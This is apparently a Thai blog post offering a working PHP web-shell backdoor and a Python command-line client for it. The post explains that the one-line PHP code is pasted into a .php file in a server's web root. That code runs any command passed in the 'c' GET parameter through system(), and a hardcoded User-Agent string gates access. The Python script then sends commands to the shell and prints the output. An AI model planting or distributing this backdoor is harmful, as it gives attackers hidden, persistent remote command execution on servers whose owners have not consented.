บทความนี้เป็น Python Script สำหรับเข้าถึง Command-Line Interface ที่เป็นผู้ใช้สิทธิ์ต่ำกว่าผู้ดูแล ของเว็บเซิร์ฟเวอร์ระบบปฏิบัติการใดก็ได้ จากการวางโค้ด PHP สั้น ๆ ที่จะรับคำสั่งและรันบนฟังก์ชั่น system(); ลงบนไฟล์นามสกุล .php ไฟล์ใดไฟล์หนึ่ง ที่อยู่ภายใน Root Directory เรียกง่าย ๆ คือการทำ Backdoor อย่างง่ายเพื่อที่จะสามารถควบคุม Shell จากภายนอกได้ โดยมีเงื่อนไขการเข้าถึง Shell จากค่า HTTP USER AGENT ง่าย ๆ ทำหน้าที่เหมือนแม่กุญแจ ซึ่ง Python Script ตัวนี้ ก็เหมือนกับ "กุญแจ" ที่มีค่า HTTP USER AGENT ตรงกับเงื่อนไขของโค้ด PHP ที่ได้วางไว้ สามารถไขเข้าไปได้ และผู้อื่นไม่สามารถยิงคำสั่งผ่านค่า GET สด ๆ ได้ หากไม่รู้ค่าในเงื่อนไข HTTP USER AGENT

อย่างที่ทราบดีว่า PHP เป็นภาษาที่ทำงานฝั่งเซิร์ฟเวอร์ และตอบกลับเป็น HTML กลับมา ทำให้ผู้ใช้ ไม่สามารถอ่าน Source Code PHP ได้เลยในฝั่งลูกข่าย จึงเป็นเหตุผลที่เลือกใช้ PHP แทนที่จะเป็น Javascript
* การตั้งค่า HTTP USER AGENT ใหม่ ที่ไม่ซ้ำใครก็เป็นการเพิ่มความปลอดภัย ไม่ให้ผู้อื่นสามารถเดา หรือเปิดอ่านเงื่อนไข USER AGENT ที่เรากำหนดไว้ได้

Module ของ Python ที่ต้องติดตั้งเพิ่มได้แก่ requests โดยใช้คำสั่ง

pip install requests หรือ python -m pip install requests
ไฟล์ CoS_!Backend.py
import requests
import os

def banner():
    print(
    "                                                                                                              ",
    "  /$$$$$$             /$$$$$$        /$$ /$$$$$$$                      /$$                                 /$$",
    " /$$__  $$           /$$__  $$      | $$| $$__  $$                    | $$                                | $$",
    "| $$  \__/  /$$$$$$ | $$  \__/      | $$| $$  \ $$  /$$$$$$   /$$$$$$$| $$   /$$  /$$$$$$  /$$$$$$$   /$$$$$$$",
    "| $$       /$$__  $$|  $$$$$$       | $$| $$$$$$$  |____  $$ /$$_____/| $$  /$$/ /$$__  $$| $$__  $$ /$$__  $$",
    "| $$      | $$  \ $$ \____  $$      |__/| $$__  $$  /$$$$$$$| $$      | $$$$$$/ | $$$$$$$$| $$  \ $$| $$  | $$",
    "| $$    $$| $$  | $$ /$$  \ $$          | $$  \ $$ /$$__  $$| $$      | $$_  $$ | $$_____/| $$  | $$| $$  | $$",
    "|  $$$$$$/|  $$$$$$/|  $$$$$$/       /$$| $$$$$$$/|  $$$$$$$|  $$$$$$$| $$ \  $$|  $$$$$$$| $$  | $$|  $$$$$$$",
    " \______/  \______/  \______//$$$$$$|__/|_______/  \_______/ \_______/|__/  \__/ \_______/|__/  |__/ \_______/",
    "                            |______/                                                                         ",  
    "                                                                                                              ",
    "                                  .:: CoS_!Backend by Costerraid Studio ::.                                   ",
    "                                            A PHP Shell Remote!                                               ",
    "             -----------------------------------------------------------------------------",
    "                           >> Copy AnD pasTe this BackEnd C0de to PHP FIle. <<            ",
    "                                                                                          ",
    "                          if($_SERVER['HTTP_USER_AGENT'] == 'cosbackend_84694f         ",
    "                          e67f64babd0d57030a130f0bf9') {print(system($_GET['c']));}       ",
    "             -----------------------------------------------------------------------------",
    "                                                                                                              ",
    sep="\n")

def cls():
    os.system('cls' if os.name=='nt' else 'clear')

cls()
banner()

h = input("hostnaMe? >> ")
ef = input("http://"+h+"/(FIle Path).php >> ")
headers = {'User-Agent': 'cosbackend_84694fe67f64babd0d57030a130f0bf9'}
check_user = "http://"+h+"/"+ef+"?c=whoami"
whoami = requests.get(check_user, headers=headers).text
if(whoami != ""):
    while True:
        fl = input("[+] Logged in as "+whoami+" #> ")
        print("-"*50)
        c_url = "http://"+h+"/"+ef+"?c="+fl
        print(requests.get(c_url, headers=headers).text)
        print("-"*50)
        if(fl == "exit"):
            cls()
            break
        if(fl == "clear"):
            cls()
            banner()
else:
    print("[-] CaN't r3questS tO FilE : U5er-Ag3nt NOt Match !")

บทความที่ถูกอ่านล่าสุด

ใช้ Python เป็น Command-Line Interface สำหรับ PHP Backdoor

บทความนี้เป็น Python Script สำหรับเข้าถึง Command-Line Interface ที่เป็นผู้ใช้สิทธิ์ต่ำกว่าผู้ดูแล ของเว็บเซิร์ฟเวอร์ระบบปฏิบัติการใดก็ได้ จากการวางโค้ด PHP ...

ที่อยู่: 3.233.239.102

ติดตั้ง Linux บน Windows 8/10 โดยใช้ WSL

Microsoft ได้เปิด Features ใหม่ที่ชื่อว่า "Windows Subsystem for Linux" (WSL) เป็นนำระบบปฏิบัติการ Linux ต่างๆ ได้แก่ Ubuntu, ...

ที่อยู่: 3.233.239.102

PHP เบื้องต้น บทที่ 2 การเชื่อมต่อฐานข้อมูล

สวัสดีครับในบทความนี้ผมจะพามาเรียนรู้วิธี การเชื่อมต่อกับฐานข้อมูล MYSQL และการ Query หรือส่งคำสั่งและดึงข้อมูลเบื้องต้นบนภาษา PHP โดยสำหรับ...

ที่อยู่: 3.233.239.102

ถ่ายโอนไฟล์บน FTP Protocol ด้วย FileZilla Client/Server

File Transfer Protocol (FTP) เป็น Protocol เครือข่ายมาตรฐานสำหรับการถ่ายโอนไฟล์ระหว่าง Client กับ Server บนเครือข่ายคอมพิวเตอร์ Port 21 FileZilla เป็น Free ware ที่ผู้ใช้สามารถเลื...

ที่อยู่: 183.89.90.97

ป้องกัน DoS/DDoS บน Apache ด้วยโมดูล mod_evasive (Linux)

สวัสดีครับ ในบทความนี้ผมจะมาแนะนำขั้นตอนการติดตั้งโมดูล mod_evasive สำหรับ Apache บนระบบปฏิบัติการ Ubuntu โดยมันสามารถป้องกันการ DoS/DDoS รวมถึง brute force...

ที่อยู่: 66.249.64.84


บทความแนะนำ

ทำความรู้จักกับ ไวรัส และ มัลแวร์

ไม่มี Fixed IP ก็เปิดเซิร์ฟเวอร์ได้ฟรี ๆ ด้วยบริการ No-IP

PHP Trick: ตัดตัวอักษรอื่นนอกจาก a-z A-Z 0-9 ออกจากตัวแปร

แก้ปัญหา Disk และ CPU ขึ้น 100% ใน Task manager (Windows)

ยอดอ่านสูงสุด

แก้ปัญหา Disk และ CPU ขึ้น 100% ใน Task manager (Windows)

Hardware

Storage


พื้นที่ว่างคงเหลือ 843.04 GB

ติดตามเราบน Facebook